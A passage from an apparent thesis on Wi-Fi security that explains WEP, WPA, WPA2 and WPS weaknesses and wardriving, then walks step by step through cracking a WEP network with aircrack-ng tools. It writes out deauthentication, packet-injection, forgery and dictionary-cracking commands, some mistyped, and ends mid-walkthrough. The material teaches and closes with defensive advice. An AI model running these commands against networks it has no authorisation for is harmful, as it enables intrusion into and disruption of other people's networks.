durable and safe system and it had to be compatible with all that had been sold before
(RC4 cryptographic engine, generator RND, etc. ...)
The answer was a working group within the IEEE, called 802.11i, which was engaged in
the development of a new security system called WPA (Wi-Fi Protected Access).
Picture 10: how WPA-PSK works
But there was a problem with WPA and the problem was that it was not ready for its
publication.
This working group was forced by the industry to release the most advanced part of the
protocol, which is called WPA-PSK (Pre-Shared Key).
WPA-PSK provides an enhanced security system, which cover all the holes of WEP.
WPA-PSK can run on hardware that supported WEP, through a firmware update and / or
system drivers.
WPA-PSK fitted with an encryption type called TKIP, based on RC4, but also
21. 21
incorporates other control mechanisms and expands the size of the encryption key. It also
incorporates a new mechanism called CRC MIC.
Picture 11: differences and similarities between WPA and WPA2
As it has been discussed before, WPA was launched before its conclusion since WEP was
revealed to be an inadequate security measure.
WPA-PSK, or WPA, is safer than WEP, but it could never work in a business environment.
The reason is that WPA was based on a pre-shared key and in a business environment is
not acceptable, since the key must be shared and it can be easily compromised, since the
key is the same for all the connections. Whoever who knows the key can, not only
decipher his own traffic, but the entire network traffic.
As mentioned before, most of this security measures (MIC, PMK, etc…) were appearing
before they were finished and some manufacturers have been implementing their own
security measures, so nowadays some hybrid WPA can be easily found: WPA with AES,
Dynamic WEP or WEP+, among others hybrids.
The attacks on a network with WPA encryption are widely different to the attacks on a
network with WEP encryption. As mentioned before, WPA was meant to fix all the
vulnerabilities of WEP.
Since we cannot get the cipher key in the same way as in a WEP network, we can only
use brute force attacks based on dictionaries. Those attacks must be based on dictionaries
since the length and complexity of the password is such the process may take years.
But, besides the mentioned before, in order to be able to attack WPA networks, it is
mandatory to have some legitimate users connected. This is necessary because we need
to capture the authentication process between the access point and the user, known as
WPA Handshake. In this process, the keys of login are exchanged.
It must be noticed that the process of capturing the WPA Handsake is only available in
those networks with WPA-PSK (Pre-Shared Key). This is so since WPA-PSK, like WEP,
uses a pre-shared key, known for all the clients.
22. 22
But even when all the clients use one and only one login key to connect, different
authentication keys are settled. These authentication keys change with time and they are
different for every one of the devices.
It means that, even if we knew the pre-shared key used to connect to the network, we
would not be able to decipher into a packet capture file the traffic generated by all the
clients, but only the traffic generated by those clients we have captured the handshake
process.
2.4.5 WPA2 SECURITY
As mentioned before, WPAwas released before its completion due to the market pressure.
WPA version rolled out exclusively allowed the use of shared key in TKIP format with
RC4 encryption. This type of security covered almost all the problems that previous
versions offered and spread quickly. Nowadays, you can find plenty of wireless networks
with WPA security.
But its anticipated release led to the not publish of the planned standard, missing what
had been designed especially for corporate environments with more complex types of
encryption.
To date, the inclusion of this new standard is mandatory for those teams wishing to be
certified by the Wi-Fi Alliance.
Picture 12: Wi-Fi Alliance seal of approval
The correct implementation of this standard ensures total security of data sent and
received by a local network. This new implementation is called RSN (Robust Security
Network) and is conducted by 802.11i.
The rest of the original WPA standard that was not published in the beginning was
published in 2004 by the same group, 802.11i, and received WPA2 as its official and final
name.
WPA2 greatly improves his predecessor, WPA, even though it has support for WPA.
There are some differences between WPA and WPA2 technologies.
The main difference is that WPA2 has two types of security: WPA2 Home and WPA2
Enterprise.
WPA2 Home, also called WPA2 Personal, is adequate for most of the networks, and is
23. 23
the type of security you will find at home and small businesses. It only needs a unique
password, which is used by all customers. If the password is changed at the access point,
the password must be changed manually on all clients. The password is stored on the
clients.
Picture 13: example of how WPA2 Home works.
Moreover, WPA2 Enterprise, also known as 802.11x, is used in enterprise environments.
It is more complicated to set up and provides individualized and centralized control over
access to the wireless network. When users try to connect to the network, they need to
present their credentials to access the system. This mode supports 802.1x RADIUS
authentication and it is suitable in those cases where a RADIUS server is used, so WPA2
Enterprise should be used only when a RADIUS server is connected for the client
authentication. The use of an external RADIUS server allows multiple authentication
methods, such as certificates PKI, Active Directory, etc... With this we achieve that the
key derived from the session would be unique and that the key distribution system to the
infrastructure is improved.
Picture 14: example of how WPA2 Enterprise works.
In addition to what has been written above, WPA2 also incorporates a new security system
based on the AES algorithm.
AES offers a higher security level, but it requires specific hardware, hardware that is not
compatible with devices that only worked with WEP and WPA. It uses a cipher block of
128, 192 or 256 bits and it is considered the best cipher system. It is true that AES need
24. 24
more computing power and that it affects on the consumption of some mobile devices.
But AES is not only safer, but also more efficient because it requires less bandwidth. WPA
also incorporates the standard PMK (Pairwise Master Key) to facilitate roaming between
access points. It is more reliable than TKIP, which is based on RC4 algorithm.
Despite what have been mentioned above about WPA2, and therefore WPA, allows the
exploitation of several vulnerabilities, as the derivation of the shared key by brute force,
in addition to denial of service or two.
Recently two new vulnerabilities have been discovered:
1. TKIP attack: this attack allows the injection of a small packet of data into the
network. This attack is very interesting from a technical point of view, but it is
very impractical. On July 17th
2015, techreport.com published an article where we
could read how the attacks broke the RC4 encryption algorithm in 75 hours. We
must remember that WEP can be broken within minutes.
2. Injection of packets into a station: the problem with this exploit is that it is only
possible if we know the shared key, that is, from within the network. This exploit
is called Hole196 because this weakness of WPA2 is reported in the last line of
the page 196 of the 2007 review of IEEE 802.11 that is 1232 pages long.
But there is also other vulnerability hackers may explode: Wi-Fi Protected Setup, known
as WPS.
WPS, originally Wi-Fi Simple Config, appeared as a way to simplify the configuration of
a network with WPA2. This is a way to minimize the intervention of the user in domestic
environments or small offices. It is based on the use of an eight number PIN to configure
the access to the network.
Stefan Viehböck, a security researcher, found out in December 2011 a vulnerability in the
implementation of wireless routers that have activated WPS. This vulnerability allows the
hacker to get, by a brute force attack, the PIN used and, therefore, the pre-shared key in
a WPA2 network.
It must be said that this vulnerability cannot be exploited in all the routers.
25. 25
2.5 ANALYSIS OF HOW TO BREAK CURRENT WIFI SECURITY
2.5.1 INTRODUCTION
The attacks suffered by telecommunications networks are many and varied, ranging from
the intrusion of viruses and Trojans to alteration and theft of information confidential.
One of the most serious problems which currently faces
Wi-Fi technology is safety. A high percentage of networks are installed by system
administrators and network for its simplicity of implementation without security
consideration and therefore converting their networks open networks, without protect
information flowing through them.
As mentioned before, there are several alternatives to protect our wireless network being
WEP the weakest and oldest one and WPA2 the safer and newest one.
In this section of the paper work, some of the different ways that can be found to break
these encryption methods will be explained. An attack on WEP and WPA2 technologies
will be carried out.
2.5.2 ATTACKS ON OPEN NETWORKS
In the last twelve years, this kind of networks have proliferated, giving the citizens the
possibility to connect to the Internet anytime, anywhere. With the fast blooming of the
smartphones, this networks have suffered a peak in the last six years, since the users want
to get access to the Internet avoiding the use of their bandwidth supplied by their mobile
network operator.
In such networks no authentication is used and the communication between nodes are not
encrypted. All information circulates as plain text, and can be easily intercepted at any
point simply, with simple equipment and within the range of the network. In this type of
network user security depends the upper layers of the OSI scheme (application layer,
mainly).
Users may use private infrastructure, like VPN. But using VPN does not mean the user is
safe: Larry Seltzer, a Software Engineer, wrote an article about this topic: “(…) even
beyond this time gap, sometimes VPN connections go down. At least in the default
configurations of most operating systems, the applications on the system will fail over to
the open Wi-Fi connection. Don't blame just the public VPN vendors. The same problem
is true of corporate VPNs, unless they go to the trouble of configuring the system around
the problem.” [4]
Sniffing out passwords and cookies is not difficult and a lot of information can be easily
found on the Internet nowadays. The software required for this is free and easy to work
with.
An example might be Wireshark. Wireshark is a free and open source packet analyzer. It
is used for network troubleshooting, analysis, software and communications
protocol development, and education. Originally named Ethereal, the project was
26. 26
renamed Wireshark in May 2006 due to trademark issues.
Picture 15: Wireshark starting screen.
But not everything is lost and we can try to protect ourselves from network sniffing.
1. Avoid working on the same network as people we don’t trust: open networks
are there for us to be always online. Thanks to them we can check our email, our
social networks and our favorites websites. But we must keep in mind that our
protected work could be sniffed.
2. Always use HTTPS: packet sniffing won't reveal your password or cookies on a
properly encrypted HTTPS connections. Most popular websites allow already
HTTPS connections, like Facebook or Gmail, have made HTTPS their default
connection, but not all of them. Lots of sites still do not support HTTPS at all, and
others only support it for logins (meaning your password is safe, but your session
cookie is not).
3. Use a VPN or SSH Proxy: this option is the best option. A VPN or SSH tunnel
will act as the middleman between our computer and the dubiously secure servers
on the internet so that everything sent between your computer and your VPN or
SSH server will be encrypted—in effect encrypting all traffic that someone on
your current network might want to try sniffing.
Even when the last option is the best option, as it has been said before, VPN connection
may fail or it might take a while to connect. And not all VPN are safe: one of the most
popular VPN that can be found on the Internet, “Hola! For a better Internet”, uses our
bandwidth to create botnets. Hola! sells our bandwidth so the one who buys it is free to
use it as his will. Hola! neither uses traffic encryption, so if someone is using our
bandwidth to do something illegal, it is basically us the responsible for it.
Hola! works as a peer-to-peer VPN service, meaning this that if I am a user from
Lithuania and I want to be online as a user from Spain, what Hola! does is to redirect my
traffic through another user that is actually in Spain. This happens in the free version of
Hola! on which every user is some other user “output node”.
27. 27
Better than Hola!, there are some other free VPN services, like TunnelBear or StrongVPN.
A. Traffic monitoring attack.
This attack is the easiest one. We only need to switch our interface into monitor mode*,
scan the media passively, locate the target (as far as it is an OPEN network) and start the
capture against the access point or points that broadcast in that network.
Note: monitor mode, or RFOM mode, allows a computer with a wireless network
interface controller to monitor all traffic received from the wireless network.
We must keep in mind that, an OPEN network in a large public space will not have only
one access point, but several, located in different places.
According to the kind of implementation the network may have, we might be able to find
one main access point and the others acting as Wi-Fi repeater, all of them in the same
channel or different access points with the same ESSID but broadcasting in different
channels.
It depends on each case and the target chosen, but it might be interesting to capture the
traffic of one specific station. In this case, we must point the capture towards the specific
access point, and also capturing all the traffic in some specific channel, without realizing
a BSSID filter.
I am not going to expand on this attack, since it has no difficulty and a lot of information
can be found on the Internet.
B. Denial-of-Service attack on customers
Probably one of the most famous attacks and a very easy one to perform.
This attacks lies in sending non-authentication packages to the connected clients. It would
cause the users to non-authenticate with the access point and, therefore, the clients will
not be able to surf on the Internet.
C. Spoofing attack on customers
This attack is common on those OPEN networks where we have to pay to get access to
the Internet. The right execution of this attack depends on the implementation of each
network and specific case but normally the steps are the next:
1. Identify the list of clients connected to the access point.
2. Launch a non-authentication attack against the client.
3. Impersonate the client’s MAC address in our own adapter.
4. Connect to the OPEN network instead of the client.
But this attack imply that the client will not be able to get access to the Internet. Besides,
the successful execution of this attack lies on a lot of elements like, for example, how fast
the client connects to the OPEN network. So, in a lot of cases, the attacker and the client
will be competing to get access with the very same MAC address and, on the paper,
28. 28
neither the client and the attacker would get access to the net.
D. Capturing login credentials to the hotspot
This attack is also made for getting access to the Internet through those OPEN networks
where you have to pay.
In this specific attack, the attacker would monitor and analyze the traffic, capture the login
credentials and, therefore, get access to the Internet through the network without paying,
by using the credentials of other user.
2.5.3 ATTACKS ON WEP TECHNOLOGY
As I have explained before, WEP encryption was the first largely distributed security
measure, but it did not last for long. Within a year, first vulnerabilities and mining
methods started to appear.
By capturing a large number of packet data, and a statistical analysis, we are able to guess
the shared key in the network and to get access to the network.
These methods, based on statistics, are able to obtain results in less time than using brute-
force attacks, using a dictionary of possible passwords.
Over the years, these statistically based methods were improving and reducing the
number of packets required to guess the key. Nowadays, with modern computers, we can
easily break WEP within in three minutes.
One vulnerability of WEP encryption is located in the method of exchange of keys that
WEP uses during the authentication with SKA (Shared Key Authentication). Because of
this, not long after its publication, the users were advised against its use.
This is possible because, a simple attack to this validation system provide the attacker
with a small, but enough, amount of communication samples in plain text and cyphered,
which allows the attacker to derive a small portion of the keystream.
The keystream is a code which makes possible to cypher plain text, without knowing the
cypher key, to create new cyphered packages.
29. 29
Picture 16: how keystream is generated in WEP
One of its susceptibilities that allows the exploitation of this breach in WEP is the lack of
a method of control about the reuse of packages with an IV that has been used before.
Thanks to this, we are able to reuse any IV as many times as we want. This would allow
us to do a repetition attack.
If the Shared Key Authentication is deactivated in WEP, we obtain Open System
Authentication (OSA).
There are some differences between SKA and OSA. In OSA, the authentication and the
association will always be accepted by the access point. But even when this might, at first
sight, goes against its own security, the fact that the station is accepted does not mean that
it will be able to communicate with the access point if it does not have the shared key to
encipher and decipher its owns communications with the access point.
Even though WEP is known to be a weak security measure nowadays some WEP
networks can be found during the realization of a Wardriving. This networks must be
updated to WPA or WPA2.
A. Passive attack and statistical break
The passive monitoring attack to a network with WEP encryption is not different to
monitoring the traffic on an OPEN network.
However, the aim of monitoring is to gather enough traffic to break WEP encryption. This
amount of traffic corresponds to, approximately, 30,000 IVs, although the amount may
vary, depending on each case, and the complexity of the password.
This attack does not involve any difficulty, beyond having to wait for the traffic to be
generated, which generally requires a considerable amount of time. If the network has a
lot of traffic, the less the amount of time required. This type of attack is usually discarded
because is not a fast attack but if you have time enough, this attack is ideal.
This attack is ideal because, since it is a passive attack, it leaves no trace on the target
network.
30. 30
B. Passive attack and break using a dictionary
As mentioned before, the statistical passive break requires a large amount of time. And
sometimes, we do not have this time. In this case, we can try to break the WEP encryption
by using a statistical attack and a dictionary of possible passwords, if we have it.
In this case, all we need to do is to obtain four DATA packages, with IVs, so we would
be able to proceed with the attempt to break by dictionary. As we saw in the example
given before, we would also need the aircrack-ng tool sent as a parameter.
The dictionary may contain the list of possible passwords, either in ASCII or in
hexadecimal format. On this last case, <<h:>> must be added as a prefix while specifying
the path of the file.
Last but not least, the length of all the possible passwords must be the same as the one
that has been specified in the prompt while executing the file. Otherwise, aircrack will
ignore the dictionary and will try a statistical attack instead and, in the case of not having
IVs enough, it will never succeed.
C. Active attack of reinjection ARP
The attack if reinjection ARP (ARP Request Replay) is the most effective way while
generating traffic in a network with WEP security. This attack lies in capturing an ARP
package and sending it back to the access point, which generates another ARP package
with a new IV. The attack broadcasts the same ARP package over and over again,
generating a new IV each time, until we have enough IVs.
In the point 6.3.1, during the example of how to break WEP security, we run the command
aireplay run-ng -3 -b MAC_TARGET_ROUTER wlan0mo.
A briefly explanation of the parameters are to follow:
1. -3: this parameter specifies an ARP injection attack.
2. –h: this parameter specifies the MAC address of the client whose ARP package
we are trying to intercept. We did not use this parameter in the attack.
3. –b: this parameter specifies the BSSID, the MAC address of the access point. We
used this one in the attack.
To carry out correctly an ARP injection the MAC address of an associated client is
necessary, because the access point will only broadcast packages that come from an
associated client.
Once the attack has started, and as we could see in the picture number X, we were able to
see how the number of ARP packages raised.
And, as we could also see in the attack, in the console where we run the command
airodump-ng, after running the injection
31. 31
D. Active attack of reinjection by interactive selection
In addition to the previous attack, we have the alternative for those occasions in which
we did not succeed to capture an ARP package. We can use another kind of genuine
package, modify and inject it again obtain a reply from the access point. This kind of
attack are called Interactive Replay attack. This attack is similar to the ARP injection
attack, using the command aireplay-ng and the parameter -2.
This attack allows us to choose a package in order to reinject it again, from both the
network adapter and from a capture file previously stored.
But not all the packages can be chosen, and we cannot freely choose the package we want.
Only certain packages can be properly reinjected and accepted by the access point. An
example of a package that will be always broadcast by the access point is the one destined
to the broadcast network address, specified by the MAC address FF:FF:FF:FF:FF:FF and
with the To DS flag activated to 1 (To DS: To Distribution System), pretending to belong
to a wireless client with destination to the wired network.
An example would be:
aireplay-ng -2 –b F0:84:2F:0B:DB:C1 –d FF:FF:FF:FF:FF:FF –t 1 wlan0mon
The different parameters are explained next:
1. -2: this parameter specifies the injection attack by interactive choice.
2. –d FF:FF:FF:FF:FF:FF: this parameter select the packages with destination
address to broadcast.
3. –t 1: this parameter select packages with the To DS flag activated.
4. –b: this parameter specifies the BSSID, the MAC address of the access point.
5. wlan0mon: this parameter specifies the network adapter.
Once the attack has started, the command aireplay-ng analyzes the packages that has been
captured until it finds one that fits with the specified requirements, displaying on screen
those packages, allowing the user to reinject that package, or to discard it in order to look
for others alternatives.
If we decide to use it, and the attack has worked correctly, in the screen of airodump-ng
we would be able to see how the number of DATA packages increase. If this does not
happen, we must choose another package and start again.
E. Chop chop attack
Sometimes there might be the opportunity that, in the network, no clients are connected
or that the command aireplay-ng is not able to obtain any genuine package that will be
accepted by the access point.
In these cases, there is an attack alternative based on the vulnerability of predicting the
redundancy cyclic CRC32 code, that works with every single package sent by the access
point.
This attack is known as Chop Chop Attack. It is based on obtain a genuine package,
modify it by exploiting CRC32 vulnerability and then, reinject it again to check the
32. 32
response of the access point to every modification. This process generates an amount of
keystream enough to “build” a specific ARP package, since we know how to build that
specific package. Keystream, as how it has been told before in this thesis work, is the
login key that allows to cypher, properly, a package that has been built.
Once we have built an ARP package, we can inject it again and, in that way, increase the
traffic of IVs, as in the previous attacks.
The first step in this attack is capturing the traffic of the target and, afterwards, realizing
a fake login.
Next, we run the next command:
aireplay-ng -4 –h MAC_NETWORK_ADAPTER –b MAC_ACCESS_POINT wlan0mon
1. -4: this parameter specifies the Chop chop CRC32 prediction attack.
2. –h: this parameter specifies the MAC address of the network adapter, that must
be the same as the one specified at the fake login.
3. –b: this parameter specifies the BSSID, the MAC address of the access point.
4. wlan0mon: this parameter specifies the network adapter.
Once the election of the package found by the command aireplay-ng, the modification of
the package starts in order to carry out the attack and, like this, the necessary section of
the keystream.
When we have the keystream stored in a .xor file extension. The next step is to “build” a
valid ARP package by the packetforge-ng tool.
The command to run is as follows:
packetforge-ng -0 –a ACCESS_POINT_MAC –h NETWORK_CARD_MAC –k
DESTINATION_IP_ADDRESS –l ORIGIN_IP_ADDRESS -y FILE.xor –w
OUTPUT_FILE arp-request
1. -0: this parameter specifies the type of file we are going to generate: an ARP file.
2. –a: this parameter specifies the access point MAC address.
3. –h: this parameter specifies the network card MAC address.
4. –k: this parameter specifies the destination IP address to include in the package.
If the rank is not known, the broadcast address may be included: 255.255.255.0.
5. –l: this parameter specifies the origin IP address to include in the package. If the
rank is not known, the broadcast address may be included: 255.255.255.0.
6. –y: this parameter belongs to the keystream file obtained in the previous step.
7. –w: this parameter is the output file where the ARP package that is going to send
will be stored.
Once the package has been “built”, the next step is to inject it by using an interactive
selection attack. We do it as we saw in the previous attack:
aireplay-ng -2 –r ARP_FILE.cap wlan0mon
Where –r specifies the file with the ARP package that is going to be injected.
If the attack has been done successfully, as we saw in previous attacks, in the console
where we have executed airodump-ng, we would be able to see how the number of DATA
packets increase. Once the number of packets is big enough, the only thing left is to run
33. 33
the command aircrack-ng.
F. Fragmentation attack
This attack is very similar to the Chop Chop attack. It uses a method based on the protocol
of fragmentation of packages in smaller packages and in the prediction of its new cypher
value. It is a powerful attack but not very efficient, since not all the access points support
this protocol.
The steps to follow as in the previous attack. The only change that must be done is when
executing the attack with aireplay-ng, the value -5 as the parameter of attack, which
specifies the attack as a fragmentation attack.
G. Other attacks on WEP technology
Other attacks to WEP are based on attacking the client instead of attacking the access
point, by capturing their probe request messages and looking for a WEP network among
their favorites Wi-Fi networks, cheating them by creating a fake access point, forging the
original one, so they login into the fake access point and capturing, from those packages,
the keystream. Once we have the keystream, as we have seen before in this thesis work,
we know how to follow.
There are two attacks focused on the clients: Caffe Latte and Hirte.
2.5.4 ATTACKS ON WPA AND WPA2 TECHNOLOGY
Next, a briefly explanation some attacks against WPAand WPA2 and how they are carried
out. The next topics will be discussed:
1. Brute force attacks using dictionaries against WPA and WPA2.
2. Passwords dictionaries.
3. Attack against WPS
A. Brute force attacks using dictionaries against WPA and WPA2
As mentioned before, the attacks against WPA and WPA2 networks cannot be done but
by using dictionaries.
The first step while attacking a WPA or WPA2 network is similar to what we have seen
before: disable our network card, supplant the MAC address of the network card, by
macchanger create a virtual interface in monitor mode and start looking for a target. Once
we have found our target, the second step is to start the capture of packages being
broadcast in the channel of the target network, sorting by the BSSID.
We must remember the needed of clients connected to the access point in order to get the
handshake.
Then, we do the deauthentication attack against one client. Once the client tries to connect
again, the process of authentication will start and handshakes packages can be captured.
34. 34
To do this attack, we execute the next command:
aireplay-ng -0 1 –a ACCESS_POINT_MAC –c CLIENT_MAC wlan0mon
Where the parameter -0 specifies the attack of deauthentication, 1 indicates the number
of deauthentications that are going to be sent, -a specifies the BSSID of the access point
(MAC address), -c is the MAC address of the client we are attacking and wlan0mon is
out network adapter.
If the attack has being carried out successfully, we will see how the station we attacked is
offline and how it will connect again within a short time. Is in this moment when the
handshake packages are exchanged. Once the handshake has been captured, we can stop
the capture of more packages and move to the last step: break the password by the use of
dictionaries.
To proceed with this attack, we need a good password dictionary. If so, we execute the
next command: aircrack-ng –w DICTIONARY HANDSHAKE_FILE.cap
If we have a good password dictionary, all we have to do is to wait.
B. Passwords dictionaries
By this point, we already know how important is ho have a good password dictionary in
order to have a chance to break WPA or WPA2. There are a lot of online information, like
Rainbow Tables. [5]
But, something we must keep in mind while creating our password dictionary are the
default Wi-Fi passwords we can find in the routers provided by the main networks
operators.
These passwords are made by an algorithm, which generates the password from a seed,
depending on the BSSID, access point MAC address or the ESSID of the network.
Over time, this algorithm are broken and within long time, plenty of tools are able on the
Internet. These tools generate dictionaries with all the possible passwords for the specific
network operator they are designed for.
Even when nowadays networks operators are changing their way to create the passwords,
we can easily find plenty of networks with those passwords and whose owners did not
change the default password.
Stefan Viehböck, of whom I have spoken already in this thesis work, also discovered the
algorithm of WPA2 passwords generation used by Vodafone Europe [6], so dictionaries
for this operator can be done already.
C. Attack against WPS
We have talked already about the vulnerability of WPS technology. Discovered in
January 2011, it allows a brute force attack to obtain the eight number pin necessary to
get access to the network and, in this way, get access to the WPA2 password.
35. 35
There are a lot of tools, being the best at the time of writing Reaver, included in the
Operative System Kali Linux.
2.5.5 CONCLUSION ON WI-FI WEAKNESS POINTS
In this section I have discussed the different ways to break the security measures we may
find at nowadays WiFi networks, from OPEN networks to WPA2 networks. I have also
proved how easily WEP encryption can be broken nowadays.
When we connect to an OPEN network, we must be aware that our traffic can be easily
captured. Some hints have been written in this very thesis work. Next time we connect to
the airport free WiFi, we should think twice.
It has been noted that WEP encryption is the worst encryption measure. WEP security
can be broken within minutes and it does not require a great knowledge in the field of
wireless security: a lot of information can be found, online and in paper books, and with
current computers the process is really fast. As we will see in the next section, some WEP
networks can be found, even today. Those networks are targets for hackers. We all should
upgrade to WPA or WPA2 if possible.
Because even when WPA is safer than WEP, it was released before its conclusion so it
was only fit for domestic environment, but not for business environment. When WPA
was released it was known as WPA-PSK. One pre-shared key for all the clients might be
enough for a house but definitely not for a big company.
That is when WPA2 appeared. WPA2 was released in 2004 and came with two different
versions: WPA2 Home and WPA2 Enterprise, being this last one based on authentication
on an authentication server, which allows multiple authentication methods.
Also in the next section we will see how most of the networks detected in Vilnius have
this kind of encryption.
WPA and WPA2 are the safest encryption methods nowadays but, as we have seen before,
they do not have lack of weak points, but those vulnerabilities are more difficult to exploit
than the vulnerabilities found on WEP encryption.
But we must keep in mind that WPA and WPA2 have a weak point: WPS. We have seen
how easy is to break WPA or WPA2 encryption by a brute force attack against WPS.
WPS may be an easiest way to get access to our network, but it is also an open door in
our wall. It is true that the WPS pin I tried in this thesis work was a really easy one and
that the attack against a real one may take some hours, but still, it can be broken. We
should turn it off.
The final conclusion is that the most common security measure nowadays is WPA/WPA2
(in Vilnius, WPA/WPA2 are more or less 95% of the networks detected), but WEP is still
in use in some networks. As said before, those networks security measures must be
upgraded as soon as possible to WPA or WPA2.
36. 36
2.6 INTRODUCTION TO WARDRIVING
Wardriving, also called access point mapping, is the act of locating and possibly
exploiting Wi-Fi networks while driving around a city or elsewhere, or by foot, by a
person, using a portable computer, smartphone or tablet.
These maps, although it is supposed that they were “born” only to manage statistics and
to make users aware of the problems presented by these networks, are used to prepare
routes, working meetings, etc… situations where can come in handy to use, punctually, a
Wireless network that belongs to others.
There are also routes of travel or meetings that take place with reference maps made by
wardriving.
Scanning and identification of access points is not an illegal activity. However, access to
a Wi-Fi network without the authorization of its owner can be a criminal offense in many
countries. This can be punished with different sanctions, from paying the proportional
fraction of the Internet that has been consumed during the connection to be taken as a
criminal act of greater significance.
Wardriving began to popularize in 2000 when Peter Shipley, security consultant at the
University of Berkeley, California, spent 18 months driving his car and recording access
points. The findings and data were shown in July 2001, in the DefCon hacker conference
in September.
The conference can be watched at the DefCon website by just clicking HERE .It can also
be watched on YouTube
Picture 17: Peter Shipley, inventor of Wardriving, during his speech on July 2001
Warchalking, which gave rise to “a language of symbols usually written in chalk on the
walls informing the interested parties of the existence of a wireless network at that point”,
was created within wardriving. The initially proposed set of symbols, that gave rise to the
emergence of new technologies WPA / WPA2 and the beginning of HoneyPot wireless
networks, was completed with a new set of symbols.
37. 37
Picture 18: warchalking symbols
Picture 19: warchalking signs in the real life
As we can see in the picture above, the name “warchalking” is not a random name. It is
called like that because “warchalkers” used chalk to tell other people if in that area there
are Wi-Fi networks, safety measures and other topics.
But chalk has a lot of problems.
Over time the chalk was becoming obsolete due to maintenance problems. Chalk is
cleared, it is difficult to update and to see those symbols you have to be there, which
means you can scan yourself the environment for existing networks without searching
chalk marks (by using your smartphone or your laptop, for example).
This resulted in the location of the access points using GPS coordinates. Thus were born
projects like WiGLE (Wireless Geographic Logging Engine), which keeps a huge online
repository that stores more than 17 million access points with their corresponding
geographic location. This project has a Web tool that displays data from WiGLE in
Google Maps or tools like JiGLE (Java Imaging Geographic Lookup Engine) and DiGLE
(Delphi Imaging Geographic Lookup Engine) that are clients to retrieve information from
WiGLE and display it on Google Earth.
Another similar project is KisMap, currently on a Beta phase, which can work with
Google Maps. The information stored in KisMap is the information collected with
38. 38
Kismet, a wireless network detector for Linux that can use a GPS receiver, or other
compatible wireless networks detector.
Picture 20: KisMap interface
But wardriving it not only made by individuals. For example, Google made its own
wardriving. In 2010 Google explained how Street view cars were also doing wardriving
(when it came out, it was a shocking new). To explain itself, Google published a report.
The report indicates that Google stores information on the basis of mobile and wireless
access points in order to help the user geolocation stations when your device does not
have GPS or in places where there is no signal satellites, as indoors.
To obtain this information, the document explains that the vehicles are equipped with an
omnidirectional Maxrad BMMG24005 antenna. The signs Wi-Fi 802.11b / g / n are
processed in the car using Kismet software, to be finally sent to the Google data center.
39. 39
Picture 21: A Maxrad BMMG24005 antenna, like the one Google uses
Google cars registered MAC address, SSID, signal level, channel and protocol b / g / n
used, but not if the Wi-Fi is open or protected by WEP / WPA.
These data are obtained passively, without the Google computers trying to communicate
with the Wi-Fi router. In addition, the payload of the frames is discarded, so Google never
accesses to the content of the communication.
Of all the stored data, currently two of them are important; MAC address and the position
of the vehicle at the time it was detected. This information never leaves Google’s servers,
since the functioning of Google Location Services is that the client (Firefox, Google
Toolbar, etc.) sends a list of MAC addresses detected by the user’s Wi-Fi card Google is
trying to geolocate and then Google returns the approximate coordinates, calculated from
its database.
Street View cars are only part of the "probes" Google has, since this information is also
obtained thanks to the information sent by the company's software when running on
mobile phones or laptops.
40. 40
3. ATTACKS ON WI-FI WEAKNESS POINTS
3.1 INTRODUCTION
This part of the thesis work lies in the realization of two attacks on two different wireless
measures by exploding the weakness points that have been discussed already. At the end
of this section, two attacks would have been explained:
- Attack on WEP encryption.
- Attack on WPA2 encryption.
The aim of the realization of these attacks is to show how weakness points can be easily
exploited nowadays.
A lot of photos will be attached and every single step of the process will be explained, so
it will be very easy to follow and to carry out the attack.
3.2 ATTACK ON WEP TECHNOLOGY
Next, a briefly explanation of how to get access into a network with a WEP encryption is
to follow. To do this, Kali Linux has been chosen as the Operative System (OS), which
can be downloaded for free from the following website (link), and a few commands.
For executing the OS, we can either install it on our computer or run it from a LiveCD. I
chose the last one. To do this, all we have to do is to "install" Kali Linux on a flash drive
and, from the bios of our computer, boot from the flash drive.
Once we lunch Kali Linux, before us the desktop will be displayed.
Note: the desktop may be different, it depends on which Kali Linux is the user running.
41. 41
Picture 22: Kali Linux desktop
Then we will open a new terminal and execute the next command: airmon-ng as shown
below:
Picture 23: airmon-ng
With this command what we do is to list in a table, all the wireless network cards that
we have installed on our computer. As we can see in the picture above, in my case I
only have one. The system has assigned to it the name wlan0. If there is more than one,
the system would assign them wlan1, wlan2, etc...
42. 42
Now we are going to run three commands:
1. ifconfig wlan0 down
2. iwconfig wlan0 mode monitor
3. ifconfig wlan0 up
Picture 24: network card in monitor mode
Then we will execute the next command: check-ng airmon kill. This last command is
not always required, but it was essential on my computer in order to be able to continue
with the practice. Once this final command has been run, the name of our network card
will have passed to wlan0mon.
And finally, for the moment, we run the next command: airmon-ng start wlan0
Picture 25: starting the network card as monitor
43. 43
With these commands, the wireless card has been switched into monitor mode. Now the
network card is able to capture wireless networks that are within its reach and to show
specific data of such networks.
Picture 26: scanning the Wi-Fi networks.
Picture 27: airodump-ng wlan0mon result
The next command to execute is: airodump-ng wlan0mon
Before us a table with all networks within our network card reach is being shown. We
will be able to see the MAC address of our potential victims’ routers, the channel
through which the different routers broadcast and their encryption (WEP, WPA ...)
In this case, we are going to choose a router with WEP security. In this case the selected
network will be called TEO 29.03. It is my personal network.
44. 44
We press Control + C to exit monitoring, once we have selected the network that will be
our goal. In this case, I have chosen the network called TEO-29-3
Then we run the command airodump-ng -c -w CHANNEL_NUMBER
NAME_YOU_WISH --bssid MAC_TARGET_ROUTER wlan0mon.
Once this command has been run, our terminal looks like this:
The -c makes reference to the channel on which the corresponding victim router
transmits. The -w parameter corresponds to the file we want to open and where we want
to save all the information. We will write the name (the one we choose) of the file
below. With the parameter --bssid what we do is report that next to it we will write the
MAC address of the router victim.
After running this command, we will display a table with the network which will attack.
Check the last picture.
The process could end here and we just could wait. But this process would be extremely
slow. That's why we will open a new terminal, which will execute a new command that
will help us increase traffic and capture more packages.
We open a new terminal and run the next command:
aireplay-ng -1 0 -a MAC_TARGET_ROUTER wlan0mon
Picture 28: aireplay-ng -1 0 –a F0:84:2F:0B:DB:C1 wlan0mon
45. 45
Picture 29: increasing the traffic with the access point
Immediately afterwards we open a new one to start injecting ARP packets, which will
stimulate the victim router terminal. The command we have to run is the next:
aireplay run-ng -3 -b MAC_TARGET_ROUTER wlan0mon
Picture 30: injecting ARP packages
46. 46
Picture 31: ARP packages being injected.
We see how the ARP packets start to run. The process starts to go faster, but as
discussed in the theoretical part, the speed of this attack depends on the traffic that the
router victim has. If the victim router has a lot of traffic, the attack will go faster.
Now we wait until we have a large number of IVs, more or less, 30,000. This number is
not a constant, but it is a large enough number to break WEP safely.
Once we have reached the necessary number of IVs, we execute Control + C in all the
terminals that are opened and closed. Then, at the top of the desktop screen, we click on
